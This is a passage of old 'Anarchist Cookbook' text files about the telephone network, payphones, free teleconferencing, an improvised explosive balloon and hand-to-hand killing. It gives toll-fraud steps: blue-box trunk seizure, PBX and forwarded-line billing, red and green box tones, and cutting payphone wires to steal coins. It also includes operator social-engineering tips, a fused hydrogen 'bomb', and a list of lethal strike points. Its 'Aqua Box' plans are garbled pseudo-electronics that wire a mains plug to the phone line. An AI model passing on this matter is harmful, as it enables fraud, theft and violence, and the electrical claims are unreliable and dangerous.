  52 - Mexico (southern portion)
   7 - USSR
  81 - Japan
  98 - Iran (call & hassle those bastards!)

If you call from an area other than North America, the format is 
generally the same. For example, let's say that you wanted to call 
the White House from Switzerland to tell the prez that his 
numbered bank account is overdrawn (it happens, you know! ha ha). 
First you would dial 00 (the SWISS international dialing refix), 
then 1 (the US country code), followed by 202-456-1414 (the 
national # for the White House. Just ask for Georgy and give him 
the bad news!)

Also, country code 87 is reserved for Maritime mobile service, ie, 
calling ships:

   871 - Marisat (Atlantic)
   871 - Marisat (Pacific)
   872 - Marisat (Indian)

International Switching:
------------------------

In North America there are currently 7 no. 4 ESS's that perform 
the duty of ISC (Inter-nation Switching Centers). All 
international calls dialed from numbering zone 1 will be routed 
through one of these "gateway cities". They are:

  182 - White Plains, NY
  183 - New York, NY
  184 - Pittsburgh, PA
  185 - Orlando, Fl
  186 - Oakland, CA
  187 - Denver, CO
  188 - New York, NY

The 18X series are operator routing codes for overseas access (to 
be furthur discussed with blue boxes). All international calls use 
a signaling service called CCITT.It is an international standard 
for signaling.

Ok.. there you go for now! If you wanna read more about this, read 
part two which is the next file #36 in the Jolly Roger's cookbook!
         
                                       -Exodus-



Phone Systems Tutorial part II                  by The Jolly Roger

Part II will deal with the various types of operators, office 
heirarchy, & switching equipment.

Operators
~~~~~~~~~

There are many types of operators in the network and the more 
common ones will be discussed.

TSPS Operator:

The TSPS [(Traffic Service Position System) ass opposed to This 
Shitty Phone Service] Operator is probably the bitch (or bastard, 
for the female libertationists out there) that most of us are used 
to having to deal with. Here are his/her responsibilities:

1) Obtaning billing information for calling card or third number 
calls

2) Identifying called customer on person-to-person calls.

3) Obtaining acceptance of charges on collect calls.

4) Identifying calling numbers. This only happens when the calling 
# is not automatically recorded by CAMA (Centralized Automatic 
Message Accounting) & forwarded from the local office. This could 
be caused by equipment failures (ANIF- Automatic Number 
Identification Failure) or if the office is not equipped for CAMA 
(ONI- Operator Number Identification).

<I once has an equipment failure happen to me & the TSPS operator 
came on and said, "What # are you calling FROM?" Out of curiosity, 
I gave her the number to my CO, she thanked me & then I was 
connected to a conversation that appeared to be between a frameman 
& his wife. Then it started ringing the party I wanted to 
originally call & everyone phreaked out (excuse the pun). I 
immediately dropped this dual line conference!

You should not mess with the TSPS operator since she KNOWS which 
number that you are calling from. Your number will show up on a 
10-digit LED read-out (ANI board). She also knows whether or not 
you are at a fortress phone & she can trace calls quite readily! 
Out of all of the operators, she is one of the MOST DANGEROUS.

INWARD operator:

This operator assists your local TSPS ("0") operatorin connecting 
calls. She will never question a call as long as the call is 
withing HER SERVICE AREA. She can only be reached via other 
operators or by a blue box. From a blue box, you would dial 
KP+NPA+121+ST for the INWARD operator that will help you connect 
any calls within that NPA only. (Blue Boxing will be discussed in 
a future file).

DIRECTORY ASSISTANCE Operator:

This is the operator that you are connected to when you dial: 411 
or NPA-555-1212. She does not readily know where you are calling 
from. She does not have access to unlisted numbers, but she DOES 
know if an unlisted # exists for a certain listing.

There is also a directory assistance operator for deaf people who 
use teletypewriters. If your modem can transfer BAUDOT [(45.5 
baud). One modem that I know of that will do this is the Apple Cat 
acoustic or the Atari 830 acoustic modem. Yea I know they are hard 
to find... but if you wanna do this.. look around!) then you can 
call him/her up and have an interesting conversation. The # is: 
800-855-1155. They use the standard Telex abbreviations such as GA 
for go ahead. they tend to be nicer and will talk longer than your 
regular operators. Also, they are more vulnerable into being 
talked out of information through the process of "social 
engineering" as Chesire Catalyst would put it. 

<Unfortunately, they do not have access to much. I once 
bullshitted with one of these operators a while back and I found 
out that there are 2 such DA offices that handle TTY. One is in 
Philadelphia and the other is in California. They have approx. 7 
operators each. most of the TTY operators think that their job is 
boring (based on an official "BIOC poll"). They also feel that 
they are under-paid. They actually call up a regular DA # to 
process your request (sorry, no fancy computers!)

Other operators have access to their own DA by dialing 
KP+NPA+131+ST (MF).

CN/A operators:

CN/A Operators are operators that do exactly the opposite of what 
directory assistance operators are for. In my experience, these 
operators know more than the DA op's do & they are more 
susceptable to "social engeneering." It is possible to bullshit a 
CN/A operator for the NON-PUB DA # (ie, you give them the name & 
they give you the unlisted number. See the article on unlisted 
numbers in this cookbook for more info about them.). This is due 
to the fact that they assume that you are a fellow company 
employee. Unfortunately, the AT&T breakup has resulted in the 
break-up of a few NON-PUB DA #'s and policy changes in CN/A

INTERCEPT Operator:

The intercept operator is the one that you are connected to when 
there are notenough recordings available to tell you that the # 
has been disconnected or changed. She usually says, "What # you 
callin'?" with a foreign accent. This is the lowest operator 
lifeform. Even though they don't know where you are calling from, 
it is a waste or your time to try to verbally abuse them since 
they usually understand very little English anyway.

Incidentally, a few area DO have intelligent INTERCEPT Operators.

OTHER Operators:

And then there are the: MObile, Ship-to-Shore, Conference, Marine 
Verify, "Leave Word and Call Back," Rout & Rate 
(KP+800+141+1212+ST), & other special operators who have one 
purpose or another in the network.

Problems with an Operator> Ask to speak to their supervisor... or 
better yet the Group Chief (who is the highest ranking official in 
any office) who is the equivalent of the Madame ina whorehouse.

By the way, some CO's that willallow you to dial a 0 or 1 as the 
4th digit, will also allow you to call special operators & other 
fun Tel. Co. #'s without a blue box. This is ver rare, though! For 
example,212-121-1111 will get you a NY Inward Operator.

Office Hierarchy
~~~~~~~~~~~~~~~~

Every switching office in North America (the NPA system), is 
assigned an office name and class. There are five classes of 
offices numbered 1 through 5. Your CO is most likely a class 5 or 
end office. All long-distance (Toll) calls are switched by a toll 
office which can be a class 4, 3, 2, or 1 office. There is also a 
class 4X office callen an intermediate point. The 4X office is a 
digital one that can have an unattended exchange attached to it 
(known as a Remote Switching Unit (RSU)).

The following chart will list the Office #, name, & how many of 
those office exist (to the best of my knowledge) in North America:

Class                 Name           Abb          # Existing
-----        ----------------------- ---      -----------------
> 1          Regional Center          RC                   12
> 2          Sectional Center         SC                   67
> 3          Primary Center           PC                  230
> 4          Toll Center              TC                1,300
> 4P         Toll Point               TP                 n/a
> 4X         Intermediate Point       IP                 n/a
> 5          End Office               EO               19,000
> 6          RSU                     RSU                 n/a

When connecting a call from one party to another, the switching 
equipment usually tries to find the shortest route between the 
class 5 end office of the caller & the class 5 end officeof the 
called party. If no inter-office trunks exist between the two 
parties, it will then move upward to the next highest office for 
servicing calls (Class 4). If the Class 4 office cannot handle the 
call by sending it to another Class 4 or 5 office, it will then be 
sent to the next highest office in the hierarchy (3). The 
switching equipment first uses the high-usage interoffice trunk 
groups, if they are busy then it goes to the fina; trunk groups on 
the next highest level. If the call cannot be connected, you will 
probably get a re-order [120 IPM (interruptions per minute) busy 
signal] signal. At this time, the guys at Network Operations are 
probably shitting in their pants and trying to avoid the dreaded 
Network Dreadlock (as seen on TV!).

It is also interesting to note that 9 connections in tandem is 
called ring-around-the-rosy and it has never occured in telephone 
history. This would cause an endless loop connection [a neat way 
to really screw up the network].

The 10 regional centers in the US & the 2 in Canada are all 
interconnected. they form the foundation of the entire telephone 
network. Since there are only 12 of them, they are listed below:

Class 1 Regional Office Location   NPA
--------------------------------   ---
Dallas 4 ESS                       214
Wayne, PA                          215
Denver 4T                          303
Regina No. 2SP1-4W (Canada)        306
St. Louis 4T                       314
Rockdale, GA                       404
Pittsburgh 4E                      412
Montreal No. 1 4AETS (Canada)      504

That's it for now! More info to come Future update to the 
Cookbook! Have fun!                        -Exodus-




Basic Alliance Teleconferencing                 Courtesy of the Jolly Roger

Introduction:
------------
This phile will deal with accessing, understanding and using the Alliance
Teleconferencing Systems.... it has many sections and for best use should
be printed out...enjoy...

Alliance:
--------
Alliance Teleconferencing is an independant company which allows the general
public to access and use it's conferencing equipment.  Many rumors have
been floating apound that Alliance is a subsidary of AT&T.
Well, they are wrong.  As stated above, Alliance is an entirely independant
company.  They use sophisticated equipment to allow users to talk to many
people at once.

The Number:
---------
Alliance is in the 700 exchange, thus it is not localized, well, not
in a way.  Alliance is only in certain states, and only
residents of these certain states can access by dialing direct.  This,
however, will be discussed in a later chapter.  The numbers for alliance are
as follows:
     0-700-456-1000 (chicago)
              -1001 (los angeles)
              -1002 (chicago)
              -1003 (houston)
              -2000 (?)
              -2001 (?)
              -2002 (?)
              -2003 (?)
              -3000 (?)
              -3001 (?)
              -3002 (?)
              -3003 (?)

The locations of the first 4 numbers are known and i have stated them.
However, the numbers in the 200x and 300x are not definately known.
Rumor has it that the pattern repeats itself but this has not been proven.

Dialing:
-------
As stated before, Alliance is only in certain stated and only these states
can access them via dialing direct.  However, dialing direct causes your
residence to be charged for the conference and conference bills are not low!!!
Therefore, many ways have been discovered to start a conference without
having it billed to ones house.  They are as follows:
     
     1) Dialing through a PBX
     2) Incorporating a Blue Box
     3) Billing to a loop
     4) Billing to a forwarded call

I am sure there are many more but these are the four i will deal with.

Dialing through a PBX:
------- ------- - ---
Probably the easiest method of creating a free conference is through a PBX.
Simply call one in a state that has Alliance, input the PBX's code,
dial 9 for an outside line and then dial alliance.
An example of this would be:

PBX: 800-241-4911

When it answers it will give you a tone.  At this tone input your code.

Code: 1234

After this you will receive another tone, now dial 9 for an outside line. 
You will now hear a dial tone.  Simply dial Alliance from this point and
the conference will be billed to the PBX.

Using a Blue Box:
----- - ---- ---
Another rather simple way of starting a conference is with a Blue Box.
The following procedure is how to box a conference:
Dial a number to box off of.  In this example we will use 609-609-6099
When the party answers hit 2600hz.  This will cause the fone company's
equipment to think that you have hung up.  You will hear a <beep><kerchunk>
You have now 'seized' a trunk.  After this, switch to multi-frequency
and dial:

KP-0-700-456-x00x-ST
KP=KP tone on Blue Box
x=variable between 1 and 3
ST=ST tone on Blue Box
The equipment now thinks that the operator has dialed Alliance from her
switchboard and the conference shall be billed there.  Since Blue Boxing
is such a large topic, this is as far as I will go into it's uses.

Billing to a loop:
------- -- - ----
A third method of receiving a free conference is by billing out to a
loop.  A loop is 2 numbers that when two people call, they can talk
to each other.  You're saying woop-tee-do right? Wrong! Loops can be
<very> usefull to phreaks.  First, dial alliance direct.  After going
through the beginning procedure, which will be discussed later in this
tutorial, dial 0 and wait for an Alliance operator.  When she answers
tell her you would like to bill the conference to such and such a
number. (A loop where your phriend is on the other side) She will then
call that number to receive voice verification.
Of course your phriend will be waiting and will accept the charges.
Thus, the conference is billed to the loop.

Billing to call forwarding:
------- -- ---- ----------
When you dial a number that is call forwarded, it is first answered by
the original location, then forwarded.  The original location will
hang up if 2600hz is received from only ond end of the line.
Therefore, if you were to wait after the forwarded residence answered,
you would receive the original location's dial tone.
    
     Example:
Dial 800-325-4067
The original residence would answer, then forward the call, a second 
type of ringing would be heard.  When this second residence answers
simply wait until they hang up.  After about twenty seconds you will
then receive the original residence's dial tone since it heard 2600hz
from one end of the line.  Simply dial Alliance from this point and the
conference will be billed to the original residence.
These are the four main ways to receive a free conference.  I am sure
many more exist, but these four are quite handy themselves.

Logon Procedure:
----- ---------
Once Alliance answers you will hear a two-tone combination.  This is their
way of saying 'How many people do you want on the conference dude?'
Simply type in a 2-digit combination, depending on what bridge of Alliance
you are on, between 10 and 59.  After this either hit '*' to cancel the
conference size and inout another or hit '#' to continue.
You are now in Alliance Teleconferencing and are only seconds away from
having your own roaring conference going strong!!!

Dialing in Conferees:
------- -- ---------
To dial your first conferee, dial 1+npa+pre+suff and await his/her answer.

npa=area code
pre=prefix
suff=suffix

If the number is busy, or if no one answers simply hit '*' and your call
will be aborted.  But, if they do answer, hit the '#' key.
This will add them to the conference.
Now commence dialing other conferees.

Joining Your Conference:
------- ---- ----------
To join your conference from control mode simply hit the '#' key. 
Within a second or two you will be chatting with all your buddies.
To go back into control mode, simply hit the '#' key again.

Transferring Control:
------------ -------
To transfer control to another conferee, go into control mode, hit the
# 6+1+npa+pre+suff of the conferee you wish to give control to. If after,
you wish to abort this transfer hit the '*' key.

<note>:Transfer of control is often not available.  When you
receive a message stating this, you simply cannot transfer control.

Muted Conferences:
----- -----------
To request a muted conference simply hit the 9 key.  I am not exactly
sure what a muted conference is but it is probably a way to keep unwanted
eavesdroppers from listening in.

Dialing Alliance Operators:
------- -------- ---------
Simply dial 0 as you would from any fone and wait for the operator to answer.

Ending Your Conference:
------ ---- ----------
To end your conference all together, that is kick everyone including
yourself off, go into control mode and hit '*'...after a few seconds
simply hang up.  Your conference is over.

Are Alliance Operators Dangerous?
--- -------- --------- ---------
No.  Not in the least.  The worst they can do to you while you are having
a conference is drop all conferees including yourself.  This is in no 
way harmful, just a little aggravating.

Alliance and Tracing:
-------- --- -------
Alliance can trace, as all citizens of the United States can. 
But this has to all be pre-meditated and AT&T has to be called and it's
really a large hastle, therefore, it is almost never done.  Alliance simply
does not want it known that teenagers are phucking them over. 
The only sort of safety equipment Alliance has on-line is a simple pen
register.  This little device simply records all the numbers of the
conferees dialed.  No big deal.  All Alliance can do is call up that persons
number, threaten and question.  However, legally, they can do nothing because
all you did was answer your fone.

<note>:Almost all instructions are told to the person in command by Alliance
recordings.  A lot of this tutorial is just a listing of those
commands plus information gathered by either myself or the phellow
phreaks of the world!!!

(written by the Trooper)


In the CookBook 4!   -= Exodus =-Aqua Box Plans                                            by Jolly Roger

Every true phreaker lives in fear of the dreadded F.B.I. 'Lock In Trace.'
For a long time, it was impossible to escape from the Lock In Trace.
This box does offer an escape route with simple directions to it.
This box is quite a simple concept, and almost any phreaker with basic
electronics knowledge can construct and use it.

The Lock In Trace
------------------
A lock in trace is a device used by the F.B.I. to lock into the phone
users location so that he can not hang up while a trace is in progress.
For those of you who are not familiar with the conecpt of 'locking in',
then here's a brief desciption. The F.B.I. can tap into a conversation,
sort of like a three-way call connection. Then, when they get there,
they can plug electricity into the phone line. All phone connections
are held open by a certain voltage of electricity.
That is why you sometimes get static and faint connections when you are
calling far away, because the electricity has trouble keeping the line
up. What the lock in trace does is cut into the line and generate that same
voltage straight into the lines. That way, when you try and hang up, voltage
is retained. Your phone will ring just like someone was calling you
even after you hang up. (If you have call waiting, you should understand
better about that, for call waiting intersepts the electricity and makes
a tone that means someone is going through your line. Then, it is a matter
of which voltage is higher. When you push down the receiver,then it see-saws
the electricity to the other side. When you have a person on each line
it is impossible to hang up unless one or both of them will hang up.
If you try to hang up, voltage is retained, and your phone will ring.
That should give you an understanding of how calling works. Also, when
electricity passes through a certain point on your phone, the electricity
causes a bell to ring, or on some newer phones an electronic ring to sound.)
So, in order to eliminate the trace, you somehow must lower the
voltage level on your phone line. You should know that every time
someone else picks up the phone line, then the voltage does decrease
a little. In the first steps of planning this out, Xerox suggested getting
about a hundred phones all hooked into the same line that could all
be taken off the hook at the same time. That would greatly decrease the
voltage level. That is also why most three-way connections that are using
the bell service three way calling (which is only $3 a month) become quite
faint after a while. By now, you should understand the basic idea. You
have to drain all of the power out of the line so the voltage can
not be kept up. Rather sudden draining of power could quickly short out
the F.B.I. voltage machine, because it was only built to sustain
the exact voltage nessecary to keep the voltage out. For now, imagine
this. One of the normal Radio Shack generators that you can go
pick up that one end of the cord that hooks into the central box has a 
phone jack on it and the other has an electrical plug. This way, you
can "flash" voltage through the line, but cannot drain it. So, some
modifications have to be done.

Materials
----------
A BEOC (Basic Electrical Output Socket), like a small lamp-type
connection, where you just have a simple plug and wire that would plug
into a light bulb.
One of cords mentioned above, if you can't find one then construct your
own... Same voltage connection, but the restrainor must be built in (I.E.
The central box)
Two phone jacks (one for the modem, one for if you are being traced to
plug the aqua box into)
Some creativity and easy work.

*Notice: No phones have to be destroyed/modified to make this box, so
don't go out and buy a new phone for it!

Procedure
---------
All right, this is a very simple procedure. If you have the BEOC, it could
drain into anything: a radio, or whatever. The purpose of having
that is you are going to suck the voltage out from the phone line into
the electrical appliance so there would be no voltage left to lock
you in with.
1)Take the connection cord. Examine the plug at the end. It should have
only two prongs. If it has three, still, do not fear. Make sure the
electrical appliance is turned off unless you wanna become a crispy critter
while making this thing. Most plugs will have a hard plastic design on the
top of them to prevent you from getting in at the electrical wires inside.
Well, remove it. If you want to keep the plug (I don't see why...)
then just cut the top off. When you look inside, Lo and Behold,
you will see that at the base of the prongs there are a few wires
connecting in. Those wires conduct the power into the appliance.
So, you carefully unwrap those from the sides and pull them out until
they are about an inch ahead of the prongs. If you don't wanna keep the
jack, then just rip the prongs out. If you are, cover the prongs with
insultation tape so they will not connect with the wires when the power
is being drained from the line.
2)Do the same thing with the prongs on the other plug, so you have the
wires evenly connected. Now, wrap the end of the wires around each other.
If you happen to have the other end of the voltage cord hooked into the
phone, stop reading now, you're too fucking stupid to continue. After
you've wrapped the wires around each other, then cover the whole thing with
the plugs with insulating tape. Then, if you built your own control box
or if you bought one, then cram all the wires into it and reclose it.
That box is your ticket out of this.
3)Re-check everything to make sure it's all in place. This is a pretty
flimsy connection, but on later models when you get more experienced at
it then you can solder away at it and form the whole device into one
big box, with some kind of cheap mattel hand-held game inside to be
the power connector.  In order to use it, just keep this box handy.
Plug it into the jack if you want, but it will slightly lower the
voltage so it isn't connected. When you plug it in, if you see sparks,
unplug it and restart the whole thing. But if it just seems fine then leave it.

Use
----
Now, so you have the whole thing plugged in and all... Do not use this
unless the situation is desperate! When the trace has gone on, don't
panic, unplug your phone, and turn on the appliance that it was hooked
to. It will need energy to turn itself on, and here's a great source...
The voltage to keep a phone line open is pretty small and a simple light
bulb should drain it all in and probably short the F.B.I. computer at
the same time.

Happy boxing and stay free!               ------------Exodus

                              

Hindenberg Bomb                                       by the Jolly Roger

Needed:1 Balloon
1 Bottle
1 Liquid Plumr
1 Piece Aluminum FoilL
1 Length Fuse

Fill the bottle 3/4 full with Liquid Plumr and add a little piece of
aluminum foil to it. Put the balloon over the neck of the bottle until
the balloon is full of the resulting gas.  This is highly flammable
hydrogen.
Now tie the baloon.  Now light the fuse, and let it rise.
When the fuse contacts the balloon, watch out!!!


-------[=How to Kill Someone==]------------[=WITH YOUR BARE HANDS=]-----
            
            AN EXCERPT FROM THE ANARCHISTS COOKBOOK II.....
                         Courtesy of Exodus

This file will explain the basics of hand-to-hand combat, and will tell
of the best places to strike and kill an enemy...
When engaged in hand-to-hand combat, your life is always at stake.
There is only one purpose in combat, and that is to kill your enemy.
Never face an enemy with the idea of knocking him out.
The chances are extremely good that he will kill YOU instead.
When a weapon is not available, one must resort to the full
use of his natural weapons. The natural weapons are:

1. The knife edge of your hands.
2. Fingers folded at the second joint or knuckle.
3. The protruding knuckle of your second finger.
4. The heel of your hand.
5. Your boot
6. Elbows
7. Knees
8. and Teeth.

Attacking is a primary factor. A fight was never 
won by defensive action. Attack with all of your strength.
At any point or any situation, some vulnerable point on your enemies
body will be open for attack. Do this while screaming as screaming has
two purposes.

1. To frighten and confuse your enemy.
2. To allow you to take a deep breath which, in turn, will put
more oxygen in your blood stream. Your balance and balance of your
enemy are two inportant factors; since, if you succeed in making
your enemy lose his balance, the chances are nine to
one that you can kill him in your next move. The best over-all
stance is where your feet are spread about shoulders width apart, 
with your right foot about a foot ahead of the left. Both arms
should be bent at the elbows parallel to each other. Stand on the
balls of your feet and bend your waist slightly. Kinda of like a
boxer's crouch. Employing a sudden movement or a scream or yell can
throw your enemy off-balance. There are many vulnerable points of
the body. We will cover them now:

Eyes:Use your fingers in a V-shape and attack in gouging motion.

Nose:(Extremely vulnerable) Strike with the knife edge of the hand
along the bridge, which will cause breakage, sharp pain, temporary
blindness, and if the blow is hard enough, death. Also, deliver a blow 
with the heel of your hand in an upward motion, thiswill shove the
bone up into the brain causing death.

Adam's Apple: This spot is usually pretty well protected, but if you
get the chance, strike hard with the knife edge of your hand. This
should sever the wind-pipe, and then it's all over in a matter of
minutes.

Temple: There is a large artery up here, and if you hit it hard
enough, it will cause death. If you manage to knock your enemy down,
kick him in the temple, and he'll never get up again.

Back of the Neck: A rabbit punch, or blow delivered to the base of
the neck can easily break it, but to be safe, it is better to
use the butt of a gun or some other heavy blunt object.
Upper lip: A large network of nerves are located. These nerves are
extrememly close to the skin. A sharp upward blow will cause extreme
pain, and unconciosness.

Ears: Coming up from behind an enemy and cupping the hands in a clapping
motion over the victims ears can kill him immediately. The vibrations
caused from the clapping motion will burst his eardrums, and cause 
internal bleeding in the brain.

Groin: A VERY vulnerable spot. If left open, get it with knee
hard, and he'll buckle over very fast.

Kidneys: A large nerve that branches off to the spinal cord comes very
close to the skin at the kidneys. A direct blow with the knife edge
of your hand can cause death.

There are many more ways to kill and injure an enemy, but these should
work best for the average person. This is meant only as information
and I would not recommend that you use this for a simple High School Brawl.
Use these methods only, in your opinion, if your life is in danger.
Any one of these methods could very easily kill or cause permanent damage
to someone. One more word of caution, you should practice these moves
before using them on a dummy, or a mock battle with a friend.
(You don't have to actually hit him to practice, just work on accuracy.)


Phone Systems Tutorial III                      by The Jolly Roger

PREFACE:

THIS ARTICLE WILL FOCUS PRIMARILY ON THE STANDARD WESTERN ELECTRIC SINGLE-
SLOT COIN TELEPHONE (AKA FORTRESS FONE) WHICH CAN BE DIVIDED INTO 3 TYPES:
- DIAL-TONE FIRST (DTF)
- COIN-FIRST (CF):  (IE, IT WANTS YOUR $ BEFORE YOU RECEIVE A DIAL TONE)
- DIAL POST-PAY SERVICE (PP):  YOU PAYAFTER THE PARTY ANSWERS

DEPOSITING COINS (SLUGS):
-------------------------
ONCE YOU HAVE DEPOSITED YOUR SLUG INTO A FORTRESS, IT IS SUBJECTED TO A
GAMUT OF TESTS. THE FIRST OBSTACAL FOR A SLUG IS THE
MAGNETIC TRAP.  THIS WILL STOP ANY LIGHT-WEIGHT MAGNETIC SLUGS AND COINS.
IF IT PASSES THIS, THE SLUG IS THEN CLASSIFIED AS A NICKEL, DIME, OR
QUARTER.  EACH SLUG IS THEN CHECKED FOR APPROPRIATE SIZE AND WEIGHT.  IF THESE
TESTS ARE PASSED, IT WILL THEN TRAVEL THROUGH A NICKEL, DIME, OR QUARTER
MAGNET AS APPROPRIATE.  THESE MAGNETS SET UP AN EDDY CURRENT EFFECT WHICH
CAUSES COINS OF THE APPROPRIATE CHARACTERISTICS TO SLOW DOWN SO THEY
WILL FOLLOW THE CORRECT TRAJECTORY.  IF ALL GOES WELL, THE COIN WILL FOLLOW THE
CORRECT PATH (SUCH AS BOUNCING OFF OF THE NICKEL ANVIL) WHERE IT WILL
HOPEFULLY FALL INTO THE NARROW ACCEPTED COIN CHANNEL.
THE RATHER ELABORATE TESTS THAT ARE PERFORMED AS THE COIN TRAVELS DOWN THE
COIN CHUTE WILL STOP MOST SLUGS AND OTHER UNDESIRABLE COINS, SUCH AS
PENNIES, WHICH MUST THEN BE RETRIEVED USING THE COIN RELEASE LEVER.
IF THE SLUG MIRACULOUSLY SURVIVES THE GAMUT, IT WILL THEN STRIKE THE
APPROPRIATE TOTALIZER ARM CAUSING A RATCHET WHEEL TO ROTATE ONCE FOR EVERY
5-CENT INCREMENT (EG, A QUARTER WILL CAUSE IT TO ROTATE 5 TIMES).
THE TOTALIZER THEN CAUSES THE COIN SIGNAL OSCILLATOR TO READOUT A DUAL-
FREQUENCY SIGNAL INDICATING THE VALUE DEPOSITED TO ACTS (A COMPUTER) OR THE
TSPS OPERATOR. THESE ARE THE SAME TONES USED BY PHREAKS IN THE INFAMOUS RED
BOXES. FOR A QUARTER, 5 BEEP TONES ARE
OUTPULSED AT 12-17 PULSES PER SECOND (PPS).  A DIME CAUSES 2 BEEP TONES AT
5 - 8.5 PPS WHILE A NICKEL CAUSES ONE BEEP TONE AT 5 - 8.5 PPS.  A BEEP
CONSISTS OF 2 TONES:  2200 + 1700 HZ. A RELAY IN THE FORTRESS CALLED THE "B
RELAY" (YES, THERE IS ALSO AN 'A RELAY') PLACES A CAPACITOR ACROSS THE
SPEECH CIRCUIT DURING TOTALIZER READOUT TO PREVENT THE "CUSTOMER" FROM
HEARING THE RED BOX TONES. IN OLDER 3 SLOT PHONES:  ONE BELL
(1050-1100 HZ) FOR A NICKEL, TWO BELLS FOR A DIME, AND ONE GONG (800 HZ) FOR A
QUARTER ARE USED INSTEAD OF THE MODERN DUAL-FREQUENCY TONES.

=============
=TSPS & ACTS=
=============

WHILE FORTRESSES ARE CONNECTED TO THE CO OF THE AREA, ALL TRANSACTIONS ARE
HANDLED VIA THE TRAFFIC SERVICE POSITION SYSTEM (TSPS).  IN AREAS THAT
DO NOT HAVE ACTS, ALL CALLS THAT REQUIRE OPERATOR ASSISTANCE, SUCH AS
CALLING CARD AND COLLECT, ARE AUTOMATICALLY ROUTED TO A TSPS OPERATOR
POSITION. IN AN EFFORT TO AUTOMATE FORTRESS
SERVICE, A COMPUTER SYSTEM KNOWN AS AUTOMATED COIN TOLL SERVICE (ACTS) HAS
BEEN IMPLEMENTED IN MANY AREAS.  ACTS LISTENS TO THE RED BOX SIGNALS FROM THE
FONES AND TAKES APPROPRIATE ACTION.  IT IS ACTS WHICH SAYS, "TWO DOLLARS PLEASE
(PAUSE) PLEASE DEPOSIT TWO DOLLARS FOR THE NEXT TEN SECONDS" (AND OTHER
VARIATIONS). ALSO, IF YOU TALK FOR MORE THAN THREE MINUTES AND THEN HANG-UP,
ACTS WILL CALL BACK AND DEMAND YOUR MONEY.  ACTS IS ALSO RESPONSIBLE FOR
AUTOMATED CALLING CARD SERVICE. ACTS ALSO PROVIDE TROUBLE DIAGNOSIS FOR
CRAFTSPEOPLE (REPAIRMEN SPECIALIZING IN FORTRESSES).  FOR EXAMPLE, THERE IS A
COIN TEST WHICH IS GREAT FOR TUNING UP RED BOXES.  IN MANY AREAS THIS TEST CAN
BE ACTIVATED BY DIALING 09591230 AT A FORTRESS (THANKS TO KARL MARX FOR THIS
INFORMATION).  ONCE ACTIVATED IT WILL REQUEST THAT YOU DEPOSIT VARIOUS COINS.
IT WILL THEN IDENTIFY THE COIN AND OUTPULSE THE APPROPRIATE RED BOX
SIGNAL.  THE COINS ARE USUALLY RETURNED WHEN YOU HANG UP.
TO MAKE SURE THAT THERE IS ACTUALLY MONEY IN THE FONE, THE CO INITIATES A
"GROUND TEST" AT VARIOUS TIMES TO DETERMINE IF A COIN IS ACTUALLY IN THE
FONE.  THIS IS WHY YOU MUST DEPOSIT AT LEAST A NICKEL IN ORDER TO USE A RED
BOX!

GREEN BOXES:
------------

PAYING THE INITIAL RATE IN ORDER TO USE A RED BOX (ON CERTAIN FORTRESSES)
LEFT A SOUR TASTE IN MANY RED BOXER'S MOUTHS THUS THE GREEN BOX WAS INVENTED.
THE GREEN BOX GENERATES USEFUL TONES SUCH AS COIN COLLECT, COIN RETURN, AND
RINGBACK.  THESE ARE THE TONES THAT ACTS OR THE TSPS OPERATOR WOULD SEND TO
THE CO WHEN APPROPRIATE. UNFORTUNATELY, THE GREEN BOX CANNOT BE USED AT A
FORTRESS STATION BUT IT MUST BE USED BY THE CALLED PARTY.

HERE ARE THE TONES:
     COIN COLLECT       700 + 1100 HZ
     COIN RETURN       1100 + 1700 HZ
     RINGBACK           700 + 1700 HZ
BEFORE THE CALLED PARTY SENDS ANY OF THESE TONES, AN OPERATOR RELEASED
SIGNAL SHOULD BE SENT TO ALERT THE MF DETECTORS AT THE CO.  THIS CAN BE
ACCOMPLISHED BY SENDING 900 + 1500 HZ OR A SINGLE 2600 HZ WINK (90 MS)
FOLLOWED BY A 60 MS GAP AND THEN THE APPROPRIATE SIGNAL FOR AT LEAST 900 MS.
ALSO, DO NOT FORGET THAT THE INITIAL RATE IS COLLECTED SHORTLY BEFORE THE 3
MINUTE PERIOD IS UP. INCIDENTALLY, ONCE THE ABOVE MF TONES
FOR COLLECTING AND RETURNING COINS REACH THE CO, THEY ARE CONVERTED INTO
AN APPROPRIATE DC PULSE (-130 VOLTS FOR RETURN & +130 VOLTS FOR COLLECT). THIS
PULSE IS THEN SENT DOWN THE TIP TO THE FORTRESS.  THIS CAUSES THE COIN RELAY
TO EITHER RETURN OR COLLECT THE COINS. THE ALLEGED "T-NETWORK" TAKES ADVANTAGE
OF THIS INFORMATION.  WHEN A PULSE FOR COIN COLLECT (+130 VDC) IS SENT DOWN
THE LINE, IT MUST BE GROUNDED SOMEWHERE.  THIS IS USUALLY EITHER THE
YELLOW OR BLACK WIRE.  THUS, IF THE WIRES ARE EXPOSED, THESE WIRES CAN BE
CUT TO PREVENT THE PULSE FROM BEING GROUNDED.  WHEN THE THREE MINUTE
INITIAL PERIOD IS ALMOST UP, MAKE SURE THAT THE BLACK & YELLOW WIRES ARE
SEVERED; THEN HANG UP, WAIT ABOUT 15 SECONDS IN CASE OF A SECOND PULSE,
RECONNECT THE WIRES, PICK UP THE FONE, HANG UP AGAIN, AND IF ALL GOES WELL IT
SHOULD BE "JACKPOT" TIME.

PHYSICAL ATTACK:
----------------

A TYPICAL FORTRESS WEIGHS ROUGHLY 50 LBS. WITH AN EMPTY COIN BOX.  MOST OF
THIS IS ACCOUNTED FOR IN THE ARMOR PLATING.  WHY ALL THE SECURITY?  WELL,
BELL CONTRIBUTES IT TO THE FOLLOWING: "SOCIAL CHANGES DURING THE 1960'S
MADE THE MULTISLOT COIN STATION A PRIME TARGET FOR:  VANDALISM, STRONG ARM
ROBBERY, FRAUD, AND THEFT OF SERVICE. THIS BROUGHT ABOUT THE INTRODUCTION OF
THE MORE RUGGED SINGLE SLOT COIN  STATION AND A NEW ENVIRONMENT FOR COIN
SERVICE." AS FOR PICKING THE LOCK, I WILL QUOTE MR. PHELPS:
"WE OFTEN FANTASIZE ABOUT 'PICKING THE LOCK' OR 'GETTING A MASTER
KEY.'  WELL, YOU CAN FORGET ABOUT IT. I DON'T LIKE TO DISCOURAGE PEOPLE, BUT
IT WILL SAVE YOU FROM WASTING ALOT OF OUR TIME--TIME WHICH CAN BE PUT TO
BETTER USE (HEH, HEH)." AS FOR PHYSICAL ATTACK, THE COIN PLATE
IS SECURED ON ALL FOUR SIDE BY HARDENED STEEL BOLTS WHICH PASS THROUGH TWO
SLOTS EACH.  THESE BOLTS ARE IN TURN INTERLOCKED BY THE MAIN LOCK.
